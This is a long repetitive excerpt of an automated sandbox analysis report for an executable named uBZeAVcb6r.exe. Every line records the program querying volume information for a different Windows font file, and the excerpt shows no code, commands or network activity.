Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
